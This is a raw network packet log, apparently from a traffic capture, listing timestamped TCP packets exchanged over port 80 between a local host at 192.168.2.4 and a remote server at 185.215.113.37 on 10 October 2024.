Oct 10, 2024 18:23:17.629831076 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.629837036 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.629837036 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.629847050 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.629859924 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.629873991 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.629878044 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.629878044 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.629887104 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.629904032 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.629915953 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.629926920 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.629926920 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.629930973 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.629945040 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.629976988 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.629976988 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.633953094 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.633964062 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.633981943 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.634017944 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.634028912 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.634037971 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.634047031 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.634063005 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.634069920 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.634069920 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.634146929 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.634157896 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.634205103 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.634206057 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.634205103 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.634218931 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.634246111 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.634246111 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.634285927 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.634295940 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.634311914 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.634325981 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.634337902 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.634337902 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.634391069 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.634458065 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.634495974 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.717585087 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.717614889 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.717629910 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.717667103 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.717667103 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.717680931 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.717693090 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.717715025 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.717763901 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.717784882 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.717794895 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.717802048 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.717808008 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.717813969 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.717869043 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.717947960 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.717962980 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.718003988 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.718003988 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.718087912 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.718097925 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.718113899 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.718126059 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.718141079 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.718147993 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.718147993 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.718153954 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.718169928 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.718198061 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.718198061 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.718377113 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.718386889 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.718404055 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.718415976 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.718425035 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.718425035 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.718430996 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.718444109 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.718458891 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.718465090 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.718465090 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.718472004 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.718489885 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.718513966 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.718513966 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.718539953 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.718669891 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.718678951 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.718698025 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.718719006 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.718729973 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.718736887 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.718736887 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.718746901 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.718769073 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.718769073 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.718801975 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.718978882 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.718997002 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.719011068 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.719022989 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.719028950 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.719028950 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.719038010 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.719050884 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.719058990 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.719058990 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.719063044 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.719080925 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.719091892 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.719105005 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.719105005 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.719105959 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.719121933 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.719134092 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.719149113 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.719153881 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.719153881 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.719199896 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.719199896 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.719203949 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.719367027 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.719381094 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.719398975 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.719398975 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.719418049 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.719428062 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.719430923 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.719450951 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.719460011 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.719475985 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.719479084 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.719479084 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.719485044 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.719504118 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.719512939 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.719527006 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.719527006 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.719531059 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.719548941 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.719561100 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.719573021 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.719575882 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.719575882 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.719588995 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.719599962 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.719609976 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.719614983 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.719630957 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.719630957 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.719661951 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.719661951 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.719873905 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.720762968 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.829629898 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.834899902 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.051469088 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.051486015 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.051506996 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.051538944 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.051553965 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.051568031 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.051589012 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.051589012 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.051651955 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.051662922 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.051693916 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.051693916 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.051764011 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.051774979 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.051795006 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.051800966 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.051800966 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.051812887 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.051837921 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.051837921 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.052009106 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.052021980 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.052037954 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.052037954 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.052045107 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.052058935 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.052072048 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.052082062 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.052082062 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.052088022 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.052102089 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.052115917 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.052128077 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.052128077 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.052133083 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.052149057 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.052179098 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.052179098 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.052390099 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.052545071 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.052556038 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.052561045 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.052572012 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.052591085 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.052601099 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.052601099 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.052604914 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.052623987 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.052637100 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.052650928 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.052650928 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.052651882 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.052669048 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.052684069 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.052692890 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.052692890 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.052867889 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.053024054 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.053034067 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.053057909 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.053067923 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.053088903 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.053100109 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.053107023 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.053107023 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.053113937 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.053127050 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.053142071 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.053145885 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.053145885 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.053155899 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.053172112 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.053181887 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.053195953 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.053195953 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.053196907 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.053215981 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.053239107 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.053239107 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.053538084 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.053549051 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.053565979 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.053575039 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.053575039 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.053579092 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.053596973 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.053620100 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.053620100 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.053638935 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.053648949 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.053662062 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.053675890 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.053690910 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.053698063 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.053698063 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.053704023 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.053719997 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.053733110 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.053734064 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.053734064 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.053750038 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.053761959 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.053776979 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.053781986 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.053781986 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.053961039 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.054203987 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.054248095 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.054260969 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.054271936 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.054383993 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.054397106 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.054411888 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.054418087 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.054418087 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.054429054 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.054467916 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.054467916 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.054636002 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.054646015 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.054663897 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.054676056 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.054692984 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.054697037 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.054697037 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.054706097 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.054723024 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.054734945 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.054744005 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.054744005 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.054750919 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.054790974 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.054790974 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.055103064 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.055113077 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.055129051 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.055141926 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.055157900 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.055165052 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.055165052 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.055166960 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.055186987 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.055198908 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.055216074 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.055216074 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.055219889 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.055255890 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.055255890 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.055423021 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.055444002 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.055454969 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.055474043 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.055474043 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.055474043 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.055489063 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.055502892 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.055511951 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.055538893 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.055696964 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.055707932 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.055726051 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.055737972 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.055753946 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.055761099 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.055761099 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.055768013 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.055784941 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.055798054 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.055809975 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.055809975 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.055820942 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.055833101 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.055849075 CEST	80	49731	185.215.113.37	192.168.2.4
